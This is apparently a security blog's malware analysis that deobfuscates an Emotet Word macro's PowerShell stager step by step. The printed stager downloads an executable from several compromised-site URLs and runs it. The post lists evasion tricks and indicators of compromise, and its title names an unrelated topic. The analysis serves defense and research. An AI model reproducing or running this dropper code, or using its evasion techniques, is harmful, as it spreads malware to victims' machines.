What Is Continuous Threat Exposure Management (CTEM)?

Suleyman Ozarslan, PhD | February 08, 2020
Researchers identified Emotet for the first time in 2014 as a banking malware stealing sensitive and private information.Now, adversaries are using Emotet as Infrastructure as a Service (IaaS) for delivering malware, including other banking Trojans. Emotet incorporates various obfuscation and evasion techniques to avoid detection, and these techniques change over time.
We revealed obfuscated Visual Basic codes in the first part of the Emotet Technical Analysis series . In this second part, we analyze the PowerShell codes in the Emotet malware document ( PowerShell,
MITRE ATT&CK T1086
).
We analyzed the following Word document step by step in the first part:
MD5: 515f13034bc4ccf635b026722fd5ef9c
SHA-1: 8925b822e1d86d787b4682d1bb803cf1f5ea7031
SHA-256:
VirusTotal detection rate: 13/61 as of January 21, 2020
Names: ST_28546448.doc, 01856218536426646.doc
Let's remember the revealed VBA code ( Scripting,
MITRE ATT&CK T1064
):
1.
Do While GetObject(winmgmtS:win32_Process).Create("Powershell -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeABwAGcAeQB2AGUAJwA7ACQARQBrAHgAaABsAG8AYgBxAHIAbABoAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAG4AeQBqAHQAaABjAHIAegBqAG8AeQB2ACsAJwAuAGUAeABlACcAOwAkAFMAYgByAHkAcAB5AHcAeABnAGMAaQB0AGYAPQAnAFcAcABhAHcAeQBiAGkAcQBtAGoAJwA7ACQASABpAHIAbQB5AGgAcQBhAGwAdABvAHMAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQBUAC4AVwBlAEIAQwBMAGkARQBuAFQAOwAkAFIAeABiAHkAdwBpAGMAaQA9ACcAaAB0AHQAcAA6AC8ALwBhAGgAYwAuAG0AcgBiAGQAZQB2AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBxAHAAMAAvACoAaAB0AHQAcAA6AC8ALwBlAC0AdAB3AG8AdwAuAGIAZQAvAHYAZQByAGQAZQAvAGkAbgA2AGsALwAqAGgAdAB0AHAAcwA6AC8ALwBtAGEAZwBuAGkAZgBpAGMAZQBuAHQAcABhAGsAaQBzAHQAYQBuAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBoAGEANQBqADAAYgAxAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBxAHcAcQBvAG8ALgBjAG8AbQAvAGgAbwBtAGwAZAB3AC8AMwBwAGkAeQB5ADQALwAqAGgAdAB0AHAAOgAvAC8AcwBpAHcAYQBrAHUAcABvAHMAbwAuAGMAbwBtAC8AcwBpAHcAYQBrAHUAMgAvAFgANQB6AEIAMABlAHkALwAnAC4AIgBzAHAATABgAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE4AdQBvAGwAdAB3AGYAcQBoAD0AJwBRAHIAdgBvAGgAZABpAHUAYgBmAGUAawAnADsAZgBvAHIAZQBhAGMAaAAoACQATgBkAGwAdQBhAGwAdQB2ACAAaQBuACAAJABSAHgAYgB5AHcAaQBjAGkAKQB7AHQAcgB5AHsAJABIAGkAcgBtAHkAaABxAGEAbAB0AG8AcwAuACIARABvAHcAYABOAGwAbwBhAGQAZgBpAGAATABFACIAKAAkAE4AZABsAHUAYQBsAHUAdgAsACAAJABFAGsAeABoAGwAbwBiAHEAcgBsAGgAKQA7ACQASABrAHUAawBrAGYAbwBwAHQAagBkAHIAPQAnAFgAYQBiAGQAeAB2AGsAZgBjAG0AYQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEUAawB4AGgAbABvAGIAcQByAGwAaAApAC4AIgBMAGAAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA5ADkAMwA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgB0ACIAKAAkAEUAawB4AGgAbABvAGIAcQByAGwAaAApADsAJABZAHoAagBqAGYAcABsAG0AawBnAHgAPQAnAEIAeABsAGsAcQBtAHQAeABhACcAOwBiAHIAZQBhAGsAOwAkAE0AbwBsAGMAaABpAGoAeAA9ACcAUQB1AGEAdABsAGIAZABsAHEAdgBmAGQAcAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABSAGMAawBhAGoAcgB4AHYAaQA9ACcARQBqAGUAYwB3AGEAcgBnAGsAYwBsACcA","",GetObject("winmgmtS:win32_ProcessStartuP"),"")
Loop
In this Do While
loop, the Create
method of the Win32_Process
class is used to create a new process.
💡The Create WMI class method creates a new process.
Syntax:
uint32 Create(
[in] string CommandLine,
[in] string CurrentDirectory,
[in] Win32_ProcessStartup ProcessStartupInformation,
[out] uint32 ProcessId
);
CommandLine
to execute. It is a PowerShell
command in this code ( PowerShell,
MITRE ATT&CK T1086
).CurrentDirectory
. If this parameter is NULL
, the new process will have the same path as the calling process.ProcessStartupInformation
, like winmgmtS:win32_ProcessStartuP
in this example.
💡 The Win32_ProcessStartup abstract WMI class represents the startup configuration of a Windows-based process. The class is defined as a method type definition, which means that it is only used for passing information to the Create method of the Win32_Process class. |
Therefore, the VBA code embedded in the Word document executes a PowerShell command using WMI ( Windows Management Instrumentation,
MITRE ATT&CK T1047
) .
💡 Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems. |
We'll reveal the obfuscated malicious PowerShell
command in this blog. Let's remember the PowerShell
command:
2.
Powershell -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeABwAGcAeQB2AGUAJwA7ACQARQBrAHgAaABsAG8AYgBxAHIAbABoAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAG4AeQBqAHQAaABjAHIAegBqAG8AeQB2ACsAJwAuAGUAeABlACcAOwAkAFMAYgByAHkAcAB5AHcAeABnAGMAaQB0AGYAPQAnAFcAcABhAHcAeQBiAGkAcQBtAGoAJwA7ACQASABpAHIAbQB5AGgAcQBhAGwAdABvAHMAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQBUAC4AVwBlAEIAQwBMAGkARQBuAFQAOwAkAFIAeABiAHkAdwBpAGMAaQA9ACcAaAB0AHQAcAA6AC8ALwBhAGgAYwAuAG0AcgBiAGQAZQB2AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBxAHAAMAAvACoAaAB0AHQAcAA6AC8ALwBlAC0AdAB3AG8AdwAuAGIAZQAvAHYAZQByAGQAZQAvAGkAbgA2AGsALwAqAGgAdAB0AHAAcwA6AC8ALwBtAGEAZwBuAGkAZgBpAGMAZQBuAHQAcABhAGsAaQBzAHQAYQBuAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBoAGEANQBqADAAYgAxAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBxAHcAcQBvAG8ALgBjAG8AbQAvAGgAbwBtAGwAZAB3AC8AMwBwAGkAeQB5ADQALwAqAGgAdAB0AHAAOgAvAC8AcwBpAHcAYQBrAHUAcABvAHMAbwAuAGMAbwBtAC8AcwBpAHcAYQBrAHUAMgAvAFgANQB6AEIAMABlAHkALwAnAC4AIgBzAHAATABgAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE4AdQBvAGwAdAB3AGYAcQBoAD0AJwBRAHIAdgBvAGgAZABpAHUAYgBmAGUAawAnADsAZgBvAHIAZQBhAGMAaAAoACQATgBkAGwAdQBhAGwAdQB2ACAAaQBuACAAJABSAHgAYgB5AHcAaQBjAGkAKQB7AHQAcgB5AHsAJABIAGkAcgBtAHkAaABxAGEAbAB0AG8AcwAuACIARABvAHcAYABOAGwAbwBhAGQAZgBpAGAATABFACIAKAAkAE4AZABsAHUAYQBsAHUAdgAsACAAJABFAGsAeABoAGwAbwBiAHEAcgBsAGgAKQA7ACQASABrAHUAawBrAGYAbwBwAHQAagBkAHIAPQAnAFgAYQBiAGQAeAB2AGsAZgBjAG0AYQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEUAawB4AGgAbABvAGIAcQByAGwAaAApAC4AIgBMAGAAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA5ADkAMwA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgB0ACIAKAAkAEUAawB4AGgAbABvAGIAcQByAGwAaAApADsAJABZAHoAagBqAGYAcABsAG0AawBnAHgAPQAnAEIAeABsAGsAcQBtAHQAeABhACcAOwBiAHIAZQBhAGsAOwAkAE0AbwBsAGMAaABpAGoAeAA9ACcAUQB1AGEAdABsAGIAZABsAHEAdgBmAGQAcAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABSAGMAawBhAGoAcgB4AHYAaQA9ACcARQBqAGUAYwB3AGEAcgBnAGsAYwBsACcA
-w
parameter and the hidden
value: -w hidden
. However, there is not a parameter named -w
according to the official PowerShell documentation . In fact, the -w
parameter is completed by PowerShell
as the -WindowStyle
parameter because of the parameter substring completion feature of PowerShell
.
💡 |
💡
|
Adversaries commonly use the -WindowStyle
parameter with Hidden
value in malicious PowerShell commands to avoid detection ( Hidden Window,
MITRE ATT&CK T1143
). Actually, -WindowStyle Hidden
does not entirely hide the PowerShell command windows, it shows the command window for a while before hiding it.
|
-en
. Similar to -w
, there is not a parameter named -en
according to the official PowerShell documentation . The -en
parameter is completed as -EncodedCommand
parameter by PowerShell.
💡The |
💡
|
Therefore, we must use base64
decoding to reveal the PowerShell
command ( Obfuscated Files or Information,
MITRE ATT&CK T1027
). After base64
decoding:
3.
$Azytjhzgaumig='Nvxdxgccbng';$Nnyjthcrzjoyv = '937';$Iiqsfpsm='Rogxpgyve';$Ekxhlobqrlh=$env:userprofile+'\'+$Nnyjthcrzjoyv+'.exe';$Sbrypywxgcitf='Wpawybiqmj';$Hirmyhqaltos=&('new-o'+'bj'+'ect') NeT.WeBCLiEnT;$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spL`iT"([char]42);$Nuoltwfqh='Qrvohdiubfek';foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."Dow`Nloadfi`LE"($Ndlualuv, $Ekxhlobqrlh);$Hkukkfoptjdr='Xabdxvkfcma';If ((&('Get-I'+'tem') $Ekxhlobqrlh)."L`eng`TH" -ge 29936) {[Diagnostics.Process]::"s`TARt"($Ekxhlobqrlh);$Yzjjfplmkgx='Bxlkqmtxa';break;$Molchijx='Quatlbdlqvfdp'}}catch{}}$Rckajrxvi='Ejecwargkcl'
Let's beautify the code:
4.
$Azytjhzgaumig='Nvxdxgccbng';
$Nnyjthcrzjoyv = '937';
$Iiqsfpsm='Rogxpgyve';
$Ekxhlobqrlh=$env:userprofile+'\'+$Nnyjthcrzjoyv+'.exe';
$Sbrypywxgcitf='Wpawybiqmj';
$Hirmyhqaltos=&('new-o'+'bj'+'ect') NeT.WeBCLiEnT;
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spL`iT"([char]42);
$Nuoltwfqh='Qrvohdiubfek';
foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."Dow`Nloadfi`LE"($Ndlualuv, $Ekxhlobqrlh);
$Hkukkfoptjdr='Xabdxvkfcma';
If ((&('Get-I'+'tem') $Ekxhlobqrlh)."L`eng`TH" -ge 29936) {[Diagnostics.Process]::"s`TARt"($Ekxhlobqrlh);
$Yzjjfplmkgx='Bxlkqmtxa';
break;
$Molchijx='Quatlbdlqvfdp'}}
catch{}}
$Rckajrxvi='Ejecwargkcl'
There are garbage variables to obfuscate the code. Let's remove them:
5.
$Nnyjthcrzjoyv = '937';
$Ekxhlobqrlh=$env:userprofile+'\'+$Nnyjthcrzjoyv+'.exe';
$Hirmyhqaltos=&('new-o'+'bj'+'ect') NeT.WeBCLiEnT;
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spL`iT"([char]42);
foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."Dow`Nloadfi`LE"($Ndlualuv, $Ekxhlobqrlh);
If ((&('Get-I'+'tem') $Ekxhlobqrlh)."L`eng`TH" -ge 29936) {[Diagnostics.Process]::"s`TARt"($Ekxhlobqrlh);
break;}}
catch{}}
There are `(backtick)
characters, which are used to obfuscate the code. In this case, it is not used to escape any character, so we can remove it from the code.
|
6.
$Nnyjthcrzjoyv = '937';
$Ekxhlobqrlh=$env:userprofile+'\'+$Nnyjthcrzjoyv+'.exe';
$Hirmyhqaltos=&('new-o'+'bj'+'ect') NeT.WeBCLiEnT;
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spLiT"([char]42);
foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."DowNloadfiLE"($Ndlualuv, $Ekxhlobqrlh);
If ((&('Get-I'+'tem') $Ekxhlobqrlh)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($Ekxhlobqrlh);
break;}}
catch{}}
Let's put ' 937
' in place of $Nnyjthcrzjoyv
.
7.
$Ekxhlobqrlh=$env:userprofile+'\'+'937'+'.exe';
$Hirmyhqaltos=&('new-o'+'bj'+'ect') NeT.WeBCLiEnT;
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spLiT"([char]42);
foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."DowNloadfiLE"($Ndlualuv, $Ekxhlobqrlh);
If ((&('Get-I'+'tem') $Ekxhlobqrlh)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($Ekxhlobqrlh);
break;}}
catch{}}
Now, let's get rid of +
characters.
8.
$Ekxhlobqrlh=$env:userprofile\937.exe';
$Hirmyhqaltos=&('new-object') NeT.WeBCLiEnT;
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spLiT"([char]42);
foreach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos."DowNloadfiLE"($Ndlualuv, $Ekxhlobqrlh);
If ((&('Get-Item') $Ekxhlobqrlh)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($Ekxhlobqrlh); break;}}
catch{}}
Let's put ' $env:userprofile\937.exe
' in place of $Ekxhlobqrlh
, and ' &('new-object') NeT.WeBCLiEnT
' in place of $Hirmyhqaltos
:
9.
$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spLiT"([char]42);
foreach($Ndlualuv in $Rxbywici){try{&('new-object') NeT.WeBCLiEnT.DowNloadfiLE($Ndlualuv, $env:userprofile\937.exe);
If ((&('Get-Item') $env:userprofile\937.exe)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($env:userprofile\937.exe);
break;}}
catch{}}
Let's change variable names with more readable ones:
10.
$list='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-includes/ha5j0b1/*https://www.qwqoo.com/homldw/3piyy4/*http://siwakuposo.com/siwaku2/X5zB0ey/'."spLiT"([char]42);
foreach($url in $list){try{&('new-object') NeT.WeBCLiEnT.DowNloadfiLE($url, $env:userprofile\937.exe);
If ((&('Get-Item') $env:userprofile\937.exe)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($env:userprofile\937.exe);
break;}}
catch{}}
Now, we must reveal the $list
variable. The Split()
method is used in this variable.
|
In this case, the separator is [char]42
, which is equal to the * (asterisk)
character. Therefore,
11.
$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakistan.com/wp-includes/ha5j0b1/','https://www.qwqoo.com/homldw/3piyy4/','http://siwakuposo.com/siwaku2/X5zB0ey/')
foreach($url in $list){try{&('new-object') NeT.WeBCLiEnT."DowNloadfiLE"($url, $env:userprofile\937.exe);
If ((&('Get-Item') $env:userprofile\937.exe)."LengTH" -ge 29936) {[Diagnostics.Process]::"sTARt"($env:userprofile\937.exe); break;}}
catch{}}
Let's change the random case to PascalCase:
💡
💡Randomized case : In this old method, uppercase and lowercase letters appear in a random sequence in the code, which is useful to bypass weak security controls. |
12.
$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakistan.com/wp-includes/ha5j0b1/','https://www.qwqoo.com/homldw/3piyy4/','http://siwakuposo.com/siwaku2/X5zB0ey/')
foreach($url in $list){try{&('new-object') Net.WebClient.DownloadFile"($url, $env:userprofile\937.exe);
If ((&('Get-Item') $env:userprofile\937.exe)."Length" -ge 29936) {[Diagnostics.Process]::"Start"($env:userprofile\937.exe);
break;}}
catch{}}
$list
array that includes the following URLs
:hxxp://ahc.mrbdev.com/wp-admin/qp0/
hxxp://e-twow.be/verde/in6k/
hxxps://magnificentpakistan.com/wp-includes/ha5j0b1/
hxxps://www.qwqoo.com/homldw/3piyy4/
hxxp://siwakuposo.com/siwaku2/X5zB0ey/
foreach
loop, tries to download a file from the URLS included in the $list
array in the given order via the Net.WebClient.DownloadFile
method and saves the downloaded file to the $env:userprofile
directory as 937.exe
.
|
|
If
condition, returns true
if the length of the downloaded file 937.exe
is greater than or equal to 29936 bytes by using -ge 29936
comparison operator ( ge: greater than or equal
). If it returns true, Diagnostics.Process.Start
method executes the 937.exe
, then exits the loop. The exact file size of 937.exe
is 905472 bytes . What could be the reason for comparing the file size? The answer is simple; adversaries are trying to figure out whether the file is actually downloaded.💡Diagnostics.Process.Start(string fileName) : The Process.Start method of System.Diagnostics namespace starts a process resource by specifying the name of a document or application file and associates the resource with a new Process component. |
Adversaries used the Invoke-Item
cmdlet to execute the downloaded file in our previous Emotet analysis . Now, they are using the Process.Start
method instead of Invoke-Item
to decrease the detection rate.
In our analysis, the PowerShell coded downloaded 937.exe
from the first URL. The other URLs are also active.
MD5: 032a5220e159fcf2f33cc9799f11ade6
SHA-1: 9768eb95d1ac398425fc5eced31b5f83025c6faf
SHA-256: cb463bc2cfbe95d234afc0d3708babb85c7e29089d3691ab0ba6695eeeccb60f
VirusTotal detection rate: 6/73 as of January 21, 2020, 49/73 as of February 6, 2020
Names: 937.exe, 565.exe
The purpose of this second part of the Emotet Technical Analysis Series is analyzing the PowerShell code included in the heavily obfuscated Visual Basic macros revealed in the first article . Briefly, this PowerShell code downloads a file from a list of URLs, then executes the file as a process.
Adversaries used the following techniques in the PowerShell code for obfuscation and evasion:
WMI
was used to create a process instead of cmd
. If WMI activity is not monitored, it is hard to detect the creation of the malicious process.
Substrings of parameters were used instead of the complete version of the parameters. PowerShell completes the incomplete version of a parameter. -w
was used for -WindowStyle
and -en
was used for the -EncodedCommand
.
The -WindowStyle
parameter was used with the Hidden
value to hide the PowerShell command window.
The Base64-encoded version of the PowerShell command was used with -EncodedCommand
parameter.
Garbage variable assignments were used to obfuscate the code.
The ` (backtick
character was used to obfuscate strings. For example, Dow`Nloadfi`LE
was used instead of DowNloadfiLE
.
+
operator was used to concatenate fragmented strings. As an example, 'new-o'+'bj'+'ect'
was used instead of newobject
to evade weak security controls.
URLs were joined with * (asterisk)
character to evade weak URL regexes of security controls. Then, the Split()
method was used to separate URLs.
The [char]
conversion function was used to obfuscate. For example, [char]42
was used for the * (asterisk)
character.
Randomized case (e.g., NeT.WeBCLiEnT
) was used to bypass weak security controls.
The Process.Start
method was used to execute the downloaded file instead of the more common execution method like the Invoke-Item
cmdlet.
We will analyze the behavior of the executed file 937.exe
in the third part of the Emotet Technical Analysis series.
MITRE’s ATT&CK Techniques Observed
Execution |
Defense Evasion |
---|---|
Indicator of Compromises (IoCs)
cb463bc2cfbe95d234afc0d3708babb85c7e29089d3691ab0ba6695eeeccb60f
5kmtechnologies.com
e-twow.be
qwqoo.com
magnificentpakistan.com
siwakuposo.com
yesimsatirli.com
hxxp://ahc.mrbdev.com/wp-admin/qp0/
hxxp://e-twow.be/verde/in6k/
hxxps://humana.5kmtechnologies.com/wp-includes/KdR9xbBq1/
hxxps://magnificentpakistan.com/wp-includes/ha5j0b1/
hxxps://www.qwqoo.com/homldw/3piyy4/
hxxp://siwakuposo.com/siwaku2/X5zB0ey/
hxxp://yesimsatirli.com/baby/HsWjaCfoR/
83.150.215.163
111.90.144.211